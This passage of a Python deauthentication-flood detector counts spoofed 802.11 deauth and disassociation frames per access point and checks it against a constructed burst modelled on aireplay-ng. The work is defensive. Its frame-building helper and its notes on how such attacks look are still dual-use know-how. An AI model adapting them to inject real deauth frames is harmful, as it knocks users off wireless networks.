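        parsed = parse_mgmt(strip_radiotap(pkt))
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            return None
        subtype, dst, src, bssid, seq, reason = parsed
        q = self.seen[bssid]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()
        if len(q) == self.threshold:     # alert on the crossing, not on every frame after it
            return {"bssid": mac_str(bssid), "count": len(q), "reason": reason,
                    "broadcast": dst == b"\xff" * 6, "at": ts}
        return None


def make_frame(subtype, dst, src, bssid, seq, body=b""):
    # Constructed test frame: 8-byte radiotap header with no fields, then the management header
    radiotap = b"\x00\x00\x08\x00\x00\x00\x00\x00"
    fc = bytes([subtype << 4, 0])   # type 0 (management), no flags
    return radiotap + fc + b"\x00\x00" + dst + src + bssid + struct.pack("<H", seq << 4) + body


AP = bytes.fromhex("aabbccddee01")
BCAST = b"\xff" * 6


def constructed_stream():
    """Normal beacons, then a 64-frame broadcast deauth burst with reason 7 as aireplay-ng sends."""
    pkts = [(t * 0.1, make_frame(BEACON, BCAST, AP, AP, t)) for t in range(50)]
    pkts += [(5.0 + i * 0.002, make_frame(DEAUTH, BCAST, AP, AP, 1000 + i, struct.pack("<H", 7)))
             for i in range(64)]
    return pkts


def run(pkts, **kw):
    det = DeauthFloodDetector(**kw)
    return [a for a in (det.observe(ts, p) for ts, p in pkts) if a]


if __name__ == "__main__":
    for alert in run(constructed_stream()):
        print("ALERT deauth flood:", alert)
```

On a live sensor the same observe() call runs over frames read from a monitor-mode interface; the sequence number returned by parse_mgmt is the hook for the second check mentioned above, since aireplay-ng's spoofed frames will not continue the real AP's sequence counter.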